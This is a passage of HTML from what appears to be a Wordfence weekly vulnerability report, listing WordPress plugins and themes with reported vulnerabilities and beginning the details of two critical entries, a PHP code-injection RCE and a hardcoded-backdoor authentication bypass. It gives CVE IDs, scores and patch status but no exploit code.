			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blocks" target="_blank" rel="noopener">jet-blocks</a>
		</td>
</tr>
<tr>
<td>JetReviews</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-reviews" target="_blank" rel="noopener">jet-reviews</a>
		</td>
</tr>
<tr>
<td>JetSearch</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-search" target="_blank" rel="noopener">jet-search</a>
		</td>
</tr>
<tr>
<td>Kadence Blocks — Page Builder Toolkit for Gutenberg Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kadence-blocks" target="_blank" rel="noopener">kadence-blocks</a>
		</td>
</tr>
<tr>
<td>Kali Forms — Contact Form &amp; Drag-and-Drop Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">kali-forms</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>Klubraum Membership Request</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/klubraum-membership-request" target="_blank" rel="noopener">klubraum-membership-request</a>
		</td>
</tr>
<tr>
<td>LifterLMS – WP LMS for eLearning, Online Courses, &amp; Quizzes</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lifterlms" target="_blank" rel="noopener">lifterlms</a>
		</td>
</tr>
<tr>
<td>Link Library</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/link-library" target="_blank" rel="noopener">link-library</a>
		</td>
</tr>
<tr>
<td>Location Weather – WordPress Weather Forecast, Air Quality &amp; Weather Widget</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/location-weather" target="_blank" rel="noopener">location-weather</a>
		</td>
</tr>
<tr>
<td>MailChimp Subscribe Form, Optin Builder, PopUp Builder, Form Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailchimp-subscribe-sm" target="_blank" rel="noopener">mailchimp-subscribe-sm</a>
		</td>
</tr>
<tr>
<td>MailerPress – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailerpress" target="_blank" rel="noopener">mailerpress</a>
		</td>
</tr>
<tr>
<td>MailOptin – Popup, Optin Forms &amp; Email Newsletters for Mailchimp, HubSpot, AWeber Etc.</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mailoptin" target="_blank" rel="noopener">mailoptin</a>
		</td>
</tr>
<tr>
<td>MasterStudy LMS WordPress Plugin – for Online Courses and Education</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">masterstudy-lms-learning-management-system</a>
		</td>
</tr>
<tr>
<td>Media Cleaner: Clean your WordPress!</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/media-cleaner" target="_blank" rel="noopener">media-cleaner</a>
		</td>
</tr>
<tr>
<td>Message Filter for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cf7-message-filter" target="_blank" rel="noopener">cf7-message-filter</a>
		</td>
</tr>
<tr>
<td>Meta Box AIO</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/meta-box-aio" target="_blank" rel="noopener">meta-box-aio</a>
		</td>
</tr>
<tr>
<td>Meta for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/facebook-for-woocommerce" target="_blank" rel="noopener">facebook-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>Meta pixel for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/official-facebook-pixel" target="_blank" rel="noopener">official-facebook-pixel</a>
		</td>
</tr>
<tr>
<td>miniOrange OTP Login, Verification and SMS Notifications</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-otp-verification" target="_blank" rel="noopener">miniorange-otp-verification</a>
		</td>
</tr>
<tr>
<td>Newsletters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/newsletters-lite" target="_blank" rel="noopener">newsletters-lite</a>
		</td>
</tr>
<tr>
<td>NEX-Forms – Ultimate Forms Plugin for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nex-forms-express-wp-form-builder" target="_blank" rel="noopener">nex-forms-express-wp-form-builder</a>
		</td>
</tr>
<tr>
<td>Online Scheduling and Appointment Booking System – Bookly</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">bookly-responsive-appointment-booking-tool</a>
		</td>
</tr>
<tr>
<td>Open User Map – Interactive Leaflet Maps</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">open-user-map</a>
		</td>
</tr>
<tr>
<td>Paid Memberships Pro – Content Restriction, User Registration, &amp; Paid Subscriptions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/paid-memberships-pro" target="_blank" rel="noopener">paid-memberships-pro</a>
		</td>
</tr>
<tr>
<td>Payment forms, Buy now buttons, and Invoicing System | GetPaid</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/invoicing" target="_blank" rel="noopener">invoicing</a>
		</td>
</tr>
<tr>
<td>PDFDraft – Drag &amp; Drop PDF Builder, PDF Viewer, Embed &amp; Download PDF, Certificate &amp; Invoice Designer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pdfdraft" target="_blank" rel="noopener">pdfdraft</a>
		</td>
</tr>
<tr>
<td>Photonic Gallery &amp; Lightbox for Flickr, SmugMug &amp; Others</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photonic" target="_blank" rel="noopener">photonic</a>
		</td>
</tr>
<tr>
<td>PickPlugins Question Answer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/question-answer" target="_blank" rel="noopener">question-answer</a>
		</td>
</tr>
<tr>
<td>Pinpoint Booking System – Version 2</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/booking-system" target="_blank" rel="noopener">booking-system</a>
		</td>
</tr>
<tr>
<td>PixelYourSite Pro – Your smart PIXEL (TAG) Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite-pro" target="_blank" rel="noopener">pixelyoursite-pro</a>
		</td>
</tr>
<tr>
<td>PixelYourSite – Your smart PIXEL (TAG) &amp; API Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pixelyoursite" target="_blank" rel="noopener">pixelyoursite</a>
		</td>
</tr>
<tr>
<td>Plugin Organizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/plugin-organizer" target="_blank" rel="noopener">plugin-organizer</a>
		</td>
</tr>
<tr>
<td>Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mycred" target="_blank" rel="noopener">mycred</a>
		</td>
</tr>
<tr>
<td>Powerkit – Supercharge your WordPress Site</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/powerkit" target="_blank" rel="noopener">powerkit</a>
		</td>
</tr>
<tr>
<td>Premium Packages – Sell Digital Products Securely</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">wpdm-premium-packages</a>
		</td>
</tr>
<tr>
<td>Pronamic Pay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pronamic-ideal" target="_blank" rel="noopener">pronamic-ideal</a>
		</td>
</tr>
<tr>
<td>Qode Tours</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/qode-tours" target="_blank" rel="noopener">qode-tours</a>
		</td>
</tr>
<tr>
<td>Rank Math SEO – AI SEO Tools to Dominate SEO Rankings</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-by-rank-math" target="_blank" rel="noopener">seo-by-rank-math</a>
		</td>
</tr>
<tr>
<td>RealHomes Memberships</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/inspiry-memberships" target="_blank" rel="noopener">inspiry-memberships</a>
		</td>
</tr>
<tr>
<td>Realtyna Organic IDX plugin + WPL Real Estate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">real-estate-listing-realtyna-wpl</a>
		</td>
</tr>
<tr>
<td>RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-registration-form-builder-with-submission-manager" target="_blank" rel="noopener">custom-registration-form-builder-with-submission-manager</a>
		</td>
</tr>
<tr>
<td>Responsive Thumbnail Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-responsive-thumbnail-slider" target="_blank" rel="noopener">wp-responsive-thumbnail-slider</a>
		</td>
</tr>
<tr>
<td>RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News &amp; YouTube Video Feeds Aggregator</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/feedzy-rss-feeds" target="_blank" rel="noopener">feedzy-rss-feeds</a>
		</td>
</tr>
<tr>
<td>RT Mega Menu – Mega Menu Builder for Elementor &amp; Gutenberg</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rt-mega-menu" target="_blank" rel="noopener">rt-mega-menu</a>
		</td>
</tr>
<tr>
<td>Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing &amp; Integrated AI Optimization</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metasync" target="_blank" rel="noopener">metasync</a>
		</td>
</tr>
<tr>
<td>SendPulse Email Marketing Newsletter</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sendpulse-email-marketing-newsletter" target="_blank" rel="noopener">sendpulse-email-marketing-newsletter</a>
		</td>
</tr>
<tr>
<td>ShopLentor Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons-pro" target="_blank" rel="noopener">woolentor-addons-pro</a>
		</td>
</tr>
<tr>
<td>ShopLentor – All-in-One WooCommerce Growth &amp; Store Enhancement Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woolentor-addons" target="_blank" rel="noopener">woolentor-addons</a>
		</td>
</tr>
<tr>
<td>Shortcodify</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shortcodify" target="_blank" rel="noopener">shortcodify</a>
		</td>
</tr>
<tr>
<td>Simple Link Directory Pro &#8211; AI Powered</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simple-link-directory-pro" target="_blank" rel="noopener">simple-link-directory-pro</a>
		</td>
</tr>
<tr>
<td>Simply Schedule Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-schedule-appointments" target="_blank" rel="noopener">simply-schedule-appointments</a>
		</td>
</tr>
<tr>
<td>Single Sign On For TNG</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/single-sign-on-for-tng" target="_blank" rel="noopener">single-sign-on-for-tng</a>
		</td>
</tr>
<tr>
<td>SMS Alert – SMS &amp; OTP for WooCommerce, Order Notifications &amp; Abandoned Cart Recovery</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sms-alert" target="_blank" rel="noopener">sms-alert</a>
		</td>
</tr>
<tr>
<td>Social Share, Social Login and Social Comments Plugin – Super Socializer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-socializer" target="_blank" rel="noopener">super-socializer</a>
		</td>
</tr>
<tr>
<td>Spam protection, Honeypot, Anti-Spam by CleanTalk</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect" target="_blank" rel="noopener">cleantalk-spam-protect</a>
		</td>
</tr>
<tr>
<td>SpeedyCache – Cache, Optimization, Performance</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/speedycache" target="_blank" rel="noopener">speedycache</a>
		</td>
</tr>
<tr>
<td>Spider Analyser – WordPress搜索引擎蜘蛛分析插件</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/spider-analyser" target="_blank" rel="noopener">spider-analyser</a>
		</td>
</tr>
<tr>
<td>Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/excel-like-price-change-for-woocommerce-and-wp-e-commerce-light" target="_blank" rel="noopener">excel-like-price-change-for-woocommerce-and-wp-e-commerce-light</a>
		</td>
</tr>
<tr>
<td>Staff Training</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/staff-training" target="_blank" rel="noopener">staff-training</a>
		</td>
</tr>
<tr>
<td>StoreGrowth – Upsell, BOGO, Quick View, Direct Checkout &amp; Side Cart for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/storegrowth-sales-booster" target="_blank" rel="noopener">storegrowth-sales-booster</a>
		</td>
</tr>
<tr>
<td>Subscriptions for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/subscriptions-for-woocommerce" target="_blank" rel="noopener">subscriptions-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>SureForms – Contact Form Builder, AI Forms, Payment Form, Survey &amp; Quiz</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sureforms" target="_blank" rel="noopener">sureforms</a>
		</td>
</tr>
<tr>
<td>Survey Form Block – collect answers and insights from your audience</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/survey-form-block" target="_blank" rel="noopener">survey-form-block</a>
		</td>
</tr>
<tr>
<td>Sync Post With Other Site</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sync-post-with-other-site" target="_blank" rel="noopener">sync-post-with-other-site</a>
		</td>
</tr>
<tr>
<td>Taskbuilder – Project Management &amp; Task Management Tool With Kanban Board</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/taskbuilder" target="_blank" rel="noopener">taskbuilder</a>
		</td>
</tr>
<tr>
<td>Theme Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/theme-editor" target="_blank" rel="noopener">theme-editor</a>
		</td>
</tr>
<tr>
<td>Thrive Leads</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/thrive-leads" target="_blank" rel="noopener">thrive-leads</a>
		</td>
</tr>
<tr>
<td>TrueBooker – Appointment Booking and Scheduler System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">truebooker-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Tutor LMS – eLearning and online course solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">tutor</a>
		</td>
</tr>
<tr>
<td>Ultimate Addons for Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-elementor" target="_blank" rel="noopener">ultimate-elementor</a>
		</td>
</tr>
<tr>
<td>Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">ultimate-store-kit</a>
		</td>
</tr>
<tr>
<td>Ultra Addons for Contact Form 7</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-contact-form-7" target="_blank" rel="noopener">ultimate-addons-for-contact-form-7</a>
		</td>
</tr>
<tr>
<td>Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">uncanny-automator</a>
		</td>
</tr>
<tr>
<td>User Access Manager</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-access-manager" target="_blank" rel="noopener">user-access-manager</a>
		</td>
</tr>
<tr>
<td>User Profile Builder – Beautiful User Registration Forms, User Profiles &amp; User Role Editor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/profile-builder" target="_blank" rel="noopener">profile-builder</a>
		</td>
</tr>
<tr>
<td>User Profile Picture</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/metronet-profile-picture" target="_blank" rel="noopener">metronet-profile-picture</a>
		</td>
</tr>
<tr>
<td>Vimeo</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vimeo" target="_blank" rel="noopener">vimeo</a>
		</td>
</tr>
<tr>
<td>W3 Total Cache</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3-total-cache" target="_blank" rel="noopener">w3-total-cache</a>
		</td>
</tr>
<tr>
<td>Web Directory Free</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/web-directory-free" target="_blank" rel="noopener">web-directory-free</a>
		</td>
</tr>
<tr>
<td>Wholesale for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-wholesale-pricing" target="_blank" rel="noopener">woo-wholesale-pricing</a>
		</td>
</tr>
<tr>
<td>WooCommerce &#8211; Social Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-social-login" target="_blank" rel="noopener">woo-social-login</a>
		</td>
</tr>
<tr>
<td>WooCommerce PayPal Payments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-paypal-payments" target="_blank" rel="noopener">woocommerce-paypal-payments</a>
		</td>
</tr>
<tr>
<td>WowStore – Store Builder &amp; Product Blocks for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/product-blocks" target="_blank" rel="noopener">product-blocks</a>
		</td>
</tr>
<tr>
<td>WP CTA – Call Now Button, Sticky Button &amp; Call to Action Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-sticky-sidebar" target="_blank" rel="noopener">easy-sticky-sidebar</a>
		</td>
</tr>
<tr>
<td>WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/delicious-recipes" target="_blank" rel="noopener">delicious-recipes</a>
		</td>
</tr>
<tr>
<td>WP Fast Total Search – The Power of Indexed Search</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fulltext-search" target="_blank" rel="noopener">fulltext-search</a>
		</td>
</tr>
<tr>
<td>WP Google Review Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-places-review-slider" target="_blank" rel="noopener">wp-google-places-review-slider</a>
		</td>
</tr>
<tr>
<td>WP Hotel Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">wp-hotel-booking</a>
		</td>
</tr>
<tr>
<td>WP Maps – Google Maps,OpenStreetMap,Mapbox,Store Locator,Listing,Directory &amp; Filters</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-google-map-plugin" target="_blank" rel="noopener">wp-google-map-plugin</a>
		</td>
</tr>
<tr>
<td>WP OAuth Server ( Login with WordPress )</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-oauth-20-server" target="_blank" rel="noopener">miniorange-oauth-20-server</a>
		</td>
</tr>
<tr>
<td>WP Password Policy</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/password-requirements" target="_blank" rel="noopener">password-requirements</a>
		</td>
</tr>
<tr>
<td>WP Photo Album Plus</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-photo-album-plus" target="_blank" rel="noopener">wp-photo-album-plus</a>
		</td>
</tr>
<tr>
<td>WP Travel – Ultimate Travel Booking System, Tour Management Engine</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-travel" target="_blank" rel="noopener">wp-travel</a>
		</td>
</tr>
<tr>
<td>WP-Lister Lite for eBay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-lister-for-ebay" target="_blank" rel="noopener">wp-lister-for-ebay</a>
		</td>
</tr>
<tr>
<td>WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">chatbot</a>
		</td>
</tr>
<tr>
<td>WPC Badge Management for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpc-badge-management" target="_blank" rel="noopener">wpc-badge-management</a>
		</td>
</tr>
<tr>
<td>wpDataTables – WordPress Data Table, Dynamic Tables &amp; Table Charts Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdatatables-2" target="_blank" rel="noopener">wpdatatables</a>
		</td>
</tr>
<tr>
<td>WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">gdpr-cookie-consent</a>
		</td>
</tr>
<tr>
<td>WPML Multilingual &amp; Multicurrency for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-multilingual" target="_blank" rel="noopener">woocommerce-multilingual</a>
		</td>
</tr>
<tr>
<td>WPvivid — Backup, Migration &amp; Staging</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpvivid-backuprestore" target="_blank" rel="noopener">wpvivid-backuprestore</a>
		</td>
</tr>
<tr>
<td>Xendit Payment</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woo-xendit-virtual-accounts" target="_blank" rel="noopener">woo-xendit-virtual-accounts</a>
		</td>
</tr>
<tr>
<td>YayPricing – WooCommerce Dynamic Pricing &amp; Discounts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yaypricing" target="_blank" rel="noopener">yaypricing</a>
		</td>
</tr>
<tr>
<td>ЮKassa для WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/yookassa" target="_blank" rel="noopener">yookassa</a>
		</td>
</tr>
<tr>
<td>المنتور فارسی</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/persian-elementor" target="_blank" rel="noopener">persian-elementor</a>
		</td>
</tr>
</table>
<hr>
<h3>WordPress Themes with Reported Vulnerabilities Last Week</h3>
</p>
<table class="wfvr-list-table software-list">
<tr>
<th class="text-center w-50">Software Name</th>
<th class="text-center">Software Slug</th>
</tr>
<tr>
<td>Betheme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/betheme" target="_blank" rel="noopener">betheme</a>
		</td>
</tr>
<tr>
<td>Gillion | Multi-Concept Blog/Magazine &amp; Shop WordPress AMP Theme</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/gillion" target="_blank" rel="noopener">gillion</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ef21a44-6d03-4197-b49c-d881f9831f46" target="_blank" rel="noopener">Admin and Site Enhancements (ASE) Pro &lt;= 8.9.0 &#8211; Unauthenticated Remote Code Execution via PHP Code Injection via cfgroup[input] Repeater Row Key</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16610" target="_blank" rel="noopener noreferrer">							CVE-2026-16610						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 29, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/admin-site-enhancements-pro" target="_blank" rel="noopener">Admin and Site Enhancements (ASE) Pro</a> <span class="wfvr-software-slug">[admin-site-enhancements-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4efd64e53b1a31312046abedbc413318.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4efd64e53b1a31312046abedbc413318"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nox-axter" target="_blank" rel="noopener">Nox Axter</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ef21a44-6d03-4197-b49c-d881f9831f46" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/70f64ea0-5375-479f-90ac-29bcdf817cef" target="_blank" rel="noopener">Advanced Responsive Video Embedder for Rumble, Odysee, YouTube, Vimeo, Kick … 10.8.7 &#8211; Unauthenticated Authentication Bypass via Hardcoded Backdoor in &#8216;_wplogin&#8217; Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18072" target="_blank" rel="noopener noreferrer">							CVE-2026-18072						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
